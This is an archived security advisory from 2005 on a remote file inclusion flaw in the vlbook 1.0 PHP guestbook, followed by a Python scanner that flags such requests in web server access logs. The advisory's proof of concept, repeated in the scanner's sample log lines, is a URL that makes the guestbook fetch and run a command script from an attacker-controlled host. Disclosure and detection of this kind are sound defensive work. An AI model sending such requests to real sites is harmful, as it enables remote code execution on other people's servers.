vlbook10.txt

2005-10-11T00:00:00
ID PACKETSTORM:40570
Type packetstorm
Reporter BiPi_HaCk
Modified 2005-10-11T00:00:00

Description

                                        
                                            `------------------------------------------------------  
Nightmare TeAmZ Advisory 005  
------------------------------------------------------  
Date - 10/2005  
vlbook Remote File Inclusion  
  
  
AFFECTED PRODUCTS  
=================  
vlbook 1.0 Guestbook  
http://vlbook.com/  
  
  
OVERVIEW  
========  
The vlbook is a free, open source and light-weight guestbook written in PHP  
using flat files to store messages and settings. It comes with an install  
script for quick and effortless installation.  
  
  
DETAILS  
=======  
  
1. Remote File Inclusion  
  
  
POC  
===  
  
1. Remote File Inclusion  
------------------------  
  
Example  
-------  
  
Vulnerable Path:  
  
/index.php?user=  
  
Example:  
  
www.[Host].com/[Path]/index.php?user=english&l=1&t=1&a=http://www.[Evil-Site].org/cmd.php?&cmd=id  
  
  
Credits  
=======  
This vulnerability was discovered and researched by BiPi_HaCk.  
Advisory by Sub_Z3r0 of Nightmare TeAmZ.  
  
Site: http://www.NightmareTeAmZ.altervista.org  
  
`
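The request shape in the advisory's example, a query parameter whose value is itself an absolute URL, can be searched for in web server access logs. The following is an added example, not part of the advisory or of vlbook's code; it assumes common/combined log format, and the function names, the `/gb/` path and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Common/combined log format: client, request target, status.
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# A parameter value that is itself an absolute remote URL.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)

def remote_params(target, max_decode=3):
    """Return [(name, value)] for query parameters carrying a remote URL."""
    hits = []
    query = target.partition("?")[2]
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double encoding.
        for _ in range(max_decode):
            decoded = unquote(value)
            if decoded == value:
                break
            value = decoded
        if REMOTE_RE.match(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Return (client, path, param, value, status) for each flagged parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        client, target, status = m.groups()
        path = target.partition("?")[0]
        for name, value in remote_params(target):
            findings.append((client, path, name, value, int(status)))
    return findings

# Constructed sample log lines (documentation addresses and example.org).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Oct/2005:10:00:01 +0000] "GET /gb/index.php?user=english&l=1&t=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Oct/2005:10:00:05 +0000] "GET /gb/index.php?user=english&l=1&t=1&a=http://www.example.org/cmd.php?&cmd=id HTTP/1.1" 200 812',
    '198.51.100.7 - - [11/Oct/2005:10:00:09 +0000] "GET /gb/index.php?user=english&a=http%253A%252F%252Fwww.example.org%252Fcmd.php HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A flagged request is a triage signal only: legitimate redirect or callback parameters also carry URLs, and a 200 status does not show that the file was included.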